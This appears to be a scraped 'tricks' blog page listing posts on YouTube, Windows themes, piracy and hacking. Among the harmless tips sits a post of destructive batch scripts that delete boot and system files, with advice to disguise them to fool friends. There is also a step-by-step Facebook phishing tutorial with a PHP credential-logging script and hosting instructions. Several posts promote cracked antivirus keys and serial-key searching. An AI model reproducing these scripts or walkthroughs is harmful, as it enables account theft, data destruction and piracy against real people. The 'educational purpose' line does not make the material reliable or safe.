How to Remove Ads on Youtube

0 comments

YouTube conducts experiments with its layout and functionality every now and then. But an average user only notices the updates to its design and not the under the hood updates which makes YouTube better and faster. But nowadays YouTube is experimenting something which everyone will fall in love with, a feature that allows you to block the ads on YouTube officially, by just changing a cookie stored in your browser.
After changing the cookie, the ads on the YouTube’s homepage, inside the YouTube player, in the right pane and the ads in the search results will disappear. It also adds channel cards, a feature which shows information about the channel when you hover over a channel’s name.


Changing the Cookie
Open YouTube in your browser.
Open “Developer Console”. This can be done by pressing keyboard shortcuts. These are browser specific, see below for your browser.

Google Chrome: Hit the “Ctrl+Shift+J” key combination.
Mozilla Firefox: Hit the “Ctrl+Shift+K” key combination.
Opera: Hit the “Ctrl+Shift+J” key combination.
Internet Explorer: Hit the “F12” key and then press the “Ctrl+2” key combination.
Apple Safari: Hit the “Ctrl+Alt+I” key combination. 

This will open “Developer Menu” at the bottom of the browser. Now press the “Esc” key to open the Console window.

NOTE The “Developer Menu” will only open if you have checked the “Show Developer menu in menu bar” check box in the “Preferences > Advanced tab”.


Now, paste the below given code in the “Console” window.

document.cookie="VISITOR_INFO1_LIVE=oKckVSqvaGw; path=/;
domain=.youtube.com";window.location.reload();



Hit the “Enter” key.

This will reload the YouTube page, free of any ads whatsoever.
To enable the ads again, either remove the YouTube cookies entirely or run the below code in the “Console” window.

document.cookie="VISITOR_INFO1_LIVE=; path=/;
domain=.youtube.com";window.location.reload();

NOTE YouTube can stop this experiment anytime they want. Therefore, below are many other ways we can block ads on YouTube.

Plz comment if u have a any difficulties faced...Iam free to gve reply as soon as possible...


Read More..

Download Pattern Lock for Computers

0 comments
Hi friendz..today Iam psoting a simple trick for you..If you use or have used a touch-screen phone, you would have used the pattern lock. A pattern lock is a type of screen lock where you see 9 dots on the screen, arranged in 3 rows and 3 columns. You need to match the dots in the same pattern as you did while setting up the lock. The pattern is almost impossible to guess and hence is reliable to be used as your computer’s locking system.

Eusing Maze Lock

Eusing Maze Lock is a free application that allows you to have pattern locking in Windows. The program works on all Windows machines running Windows XP or later. You can customize the lock in many ways. The default grid is a 3×3, which can be changed to 4×4 and 5×5 for increasing security. See below for full set of features and the customizations it allows.


Features at a Glance

Auto lock the screen when the computer starts up
Lock if the computer is idle for a specific duration
Grid size can be chosen from 3×3, 4×4 and 5×5
It can also disable the internet connection when the computer is locked
You can easily lock the PC by pressing the Hotkey or by clicking the icon in the taskbar
NOTE See the default pattern carefully when you first start the application.
                                                    Download Pattern Lock For PC



Read More..

Turn your windows 7 and 8 into an Android Kit-Kat OS

0 comments
Hi folks..Google a while ago, disclosed the name of its next version of Android and named it KitKat. And in a very short period, someone came up with a transformation pack based on the brown color of KitKat.


The pack not only changes the color theme of your computer, but also transforms it in many ways. It installs a software utility called Rocket Dock, which adds the MacOS type dock at the bottom of the screen. This dock by default has shortcuts/links to Gmail, Google Play Store, My Computer, Control Panel and many other useful locations. The taskbar is placed at the very top, like in MacOS.


The pack changes the system icons with its custom icons. It also installs Ubericon, an application that adds effects when icons and folders are launched. Default cursors are changed to custom ones, to suit the overall look of theme.
Many sidebar widgets are also added, a glimpse of which can be seen in the screenshots. The logon screen is changed and has a nice blue patterned background with glossy look.
The Logon Screen


NOTE The transformation packs are easy to install but leave some files and settings while uninstalling. I recommend you to first make a System Restore point and then go ahead with the installation. You can then restore your computer, in case you don’t like the look of your Windows after installing the transformation pack. If the pack fails to install, try to disable the User Accounts Control

The transformation pack is available both for Windows 7 and Windows 8.

Visit Skin Pack to see more screenshots and to Download KitKat skin pack


                                                                       windows 8
                                                                       windows 7
Read More..

5 Dangerous Virus that your System Crashes Completely

0 comments
SOME DANGEROUS AND DEADLY  TRICKS
[CAUTION]
DO NOT TRY THESE FOR FUN!!


1. How to create more than 3,000 folders under a minute
1) Open your notepad and type the following code.

@echo off
:top
md %random%
goto top
2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually
making hundreds of folders.md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)goto top – return the command to :top, causes an infinite loop.
NOTE: The folders will get created in the directory where you saved the ”1000.bat” file. The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t
suspect the file to be a virus.



2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.
DONT RUN THE BATCH FILE , YOU WONT RECOVER BACK AFTER YOURUN IT !!!
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. So please, use this hack only if you have no intention of rebooting your computer again. So just be careful. Here’s an alternative code.
cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat.


3. How to Delete all your system files with a small command!
Copy the following code into your notepad and save it as a .bat file.

del *.*

All your files in your hard disk will vanish in less than 5mins.

4. RAM crashing trick open notepad and type
:A
start
http://trickswonder.blogspot.com/
goto A
save with .bat extension.
Infinitely loops your browser to open up
http://trickswonder.blogspot.com/

5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.
WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!! Click Here

NOTE: Try at your own risk WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY!
Read More..

How to know Is your antivirus software working perfectly or not ?

0 comments



               This trick will let you detect whether your antivirus software is working or is just a waste. We will create a file which every antivirus sofware will detect as virus but dont worry it is harmless and will not harm your computer.

First open Notepad and copy below code into it.

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

 Save the file as virus.exe on your desktop


         As soon as you will run this file with your antivirus, if it detect virus then it is working perfectly. If not then you need to change your program.

Plz comment about this post...ThanQ for Visiting
Read More..

Simple VLC Media Player Trick that Surprises you

0 comments

In this tutorial i will share a simple trick yet interesting trick i came across while surfing on the internet. I will call it VLC Inception trick. This trick is simple and works on windows xp as well as windows 7. If you know this trick then its great if you don't then lets dive into it.

How To Do This Trick ?

  • Open Vlc Media Player.
  • Then Press Cltr + N
  • Now Type "Screen://" (without quotes)
  • Click on Play and watch this simple little trick.
Leave a comment..

Read More..

How to Watch 18+ Videos On Youtube Without Signing In

0 comments


Hi guys..Sometimes its annoying when youtube ask you to sign in for your age verification to watch 18+ videos. So i will make it easy for you by showing you a simple youtube trick to watch adult or 18+ youtube videos without signing In. This trick is 100% working as of 2013. So lets get started.

How To Watch 18+ Youtube Videos Without Logging In ?

1. First get the Url of video you want to watch. As shown below.

                         http://www.youtube.com/watch?v=4Xkh6j7RMqk 

2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk

3. Now paste the Video Id in the link given below.

                        http://www.youtube.com/v/VideoId?fs=1

      Replace VideoId with the Id you copied in Step 2

4. Now the url will become as shown below.

                      http://www.youtube.com/v/4Xkh6j7RMqk?fs=1


5. Done.

Plz comment about this post...
Read More..

How to Find Serial Key Of Any Software Using Google Simple Trick

0 comments

Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily.

How To Find Serial Key Of Any Software ?

The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

    1. Go to Google
    2. Then type  Software Name 94FBR 
Replace Software Name with the name of                               software whose serial key you want to find

                   Eg: To find serial key of Nero i will type Nero 94fbr


    3. Now press Enter and you will find serial key of software you are looking for as shown          below.


 ThanQ for Visiting...Plz Post a comment below...
Read More..

How to Convert A Webpage To PDF File simple trick

0 comments

 Hi frndz..In this post i will teach a simple trick or browser feature that let you convert any web page into PSD file format, which might help you to read your favourite articles offline. So lets get started.

How To Save Web Page To PDF File ?
1. Open the Google Chrome Browser on your PC or MAC 
2. Then go to the web page that you want to convert as a PDF. 
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the       Print dialog on Chrome Browser. 
4. Now Change the destination to “Save As PDF” and hit the save button.

5. The current web page will instantly be downloaded as a PDF document. 

Plz comment on this Post...
Read More..

Download Free latest Kaspersky Updated keys

0 comments

Hi Guys,now a days,the release of  viruses are at its peak,so we have to update the antiviruses daily without missing the premium features.Here we are providing the valid license keys of kaspersky antivirus and internet security.

Everyone will not be able to buy and afford premium price of latest anti viruses and internet securities.So here is the best option for you to download and enjoy the latest valid keys .

All the keys here we provided are surely working and if you feel any inconvenience ,repot me by commenting below,we will provide you  the fresh keys as soon as possible.So don’t hesitate to ask if the provided keys are not working.So enjoy…..!!!!!!

Instructions for activation 


1. Download and Install Kaspersky.
2. Turn off/Unplug/Disconnect your internet connection.
3. Click "Manage License" From Right Bottom of Kaspersky, Then click "Activate the application".
4. Enter key: AAAAA-AAAAA-AAAAA-AAAA3
5. Click on Next.
6. In the next window, click on Browse.
7. Specify the path to any key (file) from the Keys folder.
8. Click on Next.
9. After activation switch on the internet
10. Update virus definitions once/twice in a week to avoid key block.


                                                      Download Here (Mediafire Link)
Read More..

How to watch Deleted or Restricted Videos From Youtube

0 comments

Sometimes you read any entertainment blog and in it small adult content
of latest celebrity affairs or scandals or privet videos then we can see
the videos of then in world's largest video sharing site Youtube. But
sometimes we get error like it is no linger available this video or it breaks
our TOS. So we are very enthusiastic to see that video but we can not
see it because of the violence of Youtube TOS. So now don't be
annoyed because your solution is here and it is this most valuable
application "TubEmAll".

We can see deleted videos of Youtube by TubEmAll in order of category
and uploader. It is completely freeware tool. It is multi threaded tool. We
can view all the deleted and non deleted videos of Youtube and easily
download it.

Download TubEmAll From Here

After download this free application to view videos by uploaders go to
Action menu >> Youtube and in user paste or write name of uploader
whose uploaded video (deleted and non deleted) you want to vie and
download. Then click Save.

(NOTE: In Youtube most of removed or deleted videos comes in adult

category which not safe in Public use)
Read More..

How to download YouTube Videos In Multiple Formats Easiest Way must try this.

0 comments

Hi folks as you all know,YouTube is the most popular video sharing site in the world.Some times you may be required to download your favorite videos from YouTube.But YouTube Still not providing the direct download option to the viewers.So you are forced to use any third party softwares for this purpose.Almost all such utilities doesn’t provide you the better downloading option with various file formats,You may feel annoyed with the same.So may I give you a good news ?Well,Here I am providing you the easiest way to download YouTube videos in various formats you like.

So follow the below simple steps:

First of all you have to copy the URL of your favorite video from YouTube. and paste it in below your comfortable site..These are mentioned below
Now Go to 



2) Catch video.net (Here you must install Java Plugin)

3)KeepVid(Here you must install Java Plugin)




Then add your video URL you copied from YouTube in the space provided on top.
Now click on Download.
A list of various available formats will be displayed and click on any format you like.
You are done…Enjoy.

Did you araise a Question in mind what are the Advantages of this Method ?
Videos can be downloaded in various file formats.
Doesn’t requires any software.
Safer downloads.


How is it ???Isn’t it an easy method to download YouTube videos?Share your view below as comments and you can also inform us if any other better methods to download YouTube videos.If you have any doubt please ask us we will definitely help you.
So Enjoy……
Read More..

Download Air Hawk Pc Game Free

2 comments

Air Hawk is an action game that lets you fly the most advanced helicopters in a war-field with intense fighting between your helicopter and enemy troops. To look at it, Air Hawk is a warfare where you control a war flight with arms loaded to drop bombs and missiles on enemy aircraft and bases, escaping from their attack intelligently.
Don't think it is an online game as you can download the Air Hawk game for free and there is no need of any additional tools. Starting the game you can select and fly the helicopter of your choice from the list of 10 different helicopters provided and you can set the places of your reach. By change of levels, new helicopters are unlocked and the capability of the your combat helicopter increases.

Total levels in the play will be 20. Enemy places will change as per the levels and you've to take position by means of strong armaments of 10 varieties, while changing the levels. So, are you ready for the ultimate flight experience in a warfare…Then go 

to and download the famous Air Hawk game.



                                                                      GAME
                                       

Read More..

AVG Internet Security 2014 with keys+cracks Free Download

0 comments

Description

AVG Antivirus Internet security 2013 is available in new best user interface version. It can be found best security and system performance like ( best self protection and speed-up the operating system boot.) and much more flexibilities.
The features in AVG Antivirus Internet Security 2013 :

Improved scanning using enhanced fast scanning algorithm for fast system scanning.
Improved compatibility of detection of third party firewall.
Refined threshold for the best browser memory concumptions.
It also optimize boot using boot optimize accelerator on boot time of system.
Best and fresh user interface windows for user navigation in application and also better application user experience.
AVG Antivirus Internet Security is fully compatible for windows all version like. Windows 8.

Fixes and Improvements :


Anti- Rootkit : Improved reporting of corrupted section in system with best and easiest way.
Anti-Spam : Improved configuration of all Anti-spam component in system.
General : Alert manager component has been removed by AVG.
General : System tool component has been removed by AVG.
General : Update selection dialog box has been removed.
Set-up : Driver installation login has been extended to provide better information.

Set-up : Search shield component will not be install by default, but only after having been selected for installation.

How to use:
Extract  the archive downloaded.
Install the setup.
Use one of the license keys provided to activate your AVG for life time.
Enjoy…

Download Links :

Read More..

How to hack a Facebook account by using Phishing Method

0 comments


For facebook hacking,the most simple and easiest method is phishing and it works every time as long as your victim is not aware of it.
So what is phishing? In simple words, Phishing is way to hack an account by creating a fake login page page and then fooling your victim by telling him to log in at that page and once he does, you get his/her password.
How to hack Facebook account with Phishing?
Phishing is a pretty simple process involves only 2 easy steps.First you will have to facebook phishing page and then upload it to a web hosting site.

Things to do:
1. Creating a Facebook Phishing page:
A Facebook phishing page consists of two things:
1).html file (fake page like fb)
2) PHP file (which contains php script that saves the passwords of your victims).

Go to facebook login page i-e www.facebook.com and wait till the page properly loads.
Then copy the page source from there and paste it in notepad.This you can do by right clicking and selecting view page source.
And find :action="https://www.facebook.com/login.php?login_attempt=1"
and change it to action=pass.php.
And save the file as facebook.html.

PHP FILE :

Now you will have to make a php file that will keep record of your victim's passwords .So for this copy and paste this code in a notepad and save the file as pass.php.
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com/\">
</FRAMESET>";
?>

After this,your phishing page is successfully created .Next you will have to upload it to a free web host which is explained below.
Note: If you find it difficult to create the phishing page by yourself,you can directly download the one made by me from here.
2.Uploading Phishing page to a free web hosting site.

Now it's time to upload these two files to a webhost.There are many free web hosts available which you can use for this purpose but the one I recommend is 000webhost.com.Morever you can google for many other free web hosting so it's not a big deal.
Once you have created an account at the webhost.It will give you your cpanel account name and password via email.
Then login to your website's cpanel..
After that, upload these two files that u made earlier in your public_html directory via the file manager and once uploaded,give the fake page link to your victim.
It should be like this: www.yoursite.com/Facebook.html
Remember to change yoursite.com with the free sub domain that you have chosen when creating your web hosting account.
That's it .
Now whenever your victim will go there and login.The passwords will be automatically saved there in a Passwords.htm file and when you want to see them, you will just simply need to go there:
www.yoursite.com/Passwords.htm


Second Method for facebook Phishing.

Here is a Second tutorial about phishing.>>

Step 1) 
First you must sign for a free webhosting service like www.byethost.com or www.t35.com  orwww.000webhost.com  And register your subdomain.
after signing you will have a subdomain like www.yourname.byethost.com

Step 2) 
Now login to your account go to "control panel" then in site management option go to "online file manager" and open the folder "htdocs".

Step 3) 
Now Click Here to DOWNLOAD THIS FILE to your computer add extract the file. Inside the folder you will find three files index.php and hello.php and login_again.htm.

Step 4) 
Now replace the index.php file in the "htdocs" of the "online file manager" with the file index.php of the phisher folder in your computer and also upload hello.php andlogin_again.htm files in "htdocs" thats it! you are done.

Step 5) 
Now your homepage www.yourname.byethost.com has become a phisher. open it, you will see that your page www.yourname.byethost.com has become the login page of the site you want to hack.now all you have to do is send this link to the person whose account you want to hack.when he tries to login through it you will receive a file password.html in your "htdocs" folder of your phpnet.us account which contains the username and password of your victim.

Step 6)
Go to http://www.yourname.byethost.com/lol.htm for see the stored passwords !

Personal Note:- The attacker must have a very good convincing power to hack the facebook password with this method. Please try this method carefully as now it is widely known and the target may soon guess the attacker's intentions. The target may report the fake site and you may get in trouble.

The facebook not allow to share your fake facebooksite on facebook. You can use Domain hiding system to share your fake facebook site. (Eg: http://www.dot.tk/)

Note: This is only for Educational purpose...

Plz comment about this post.
Read More..
Icon Icon Icon Follow Me on Google Plus

Copyright 2011 All Rights Reserved / Privacy Policy / Sitemap / Contact Us

Template by / TricksWonder / Powered by / Blogger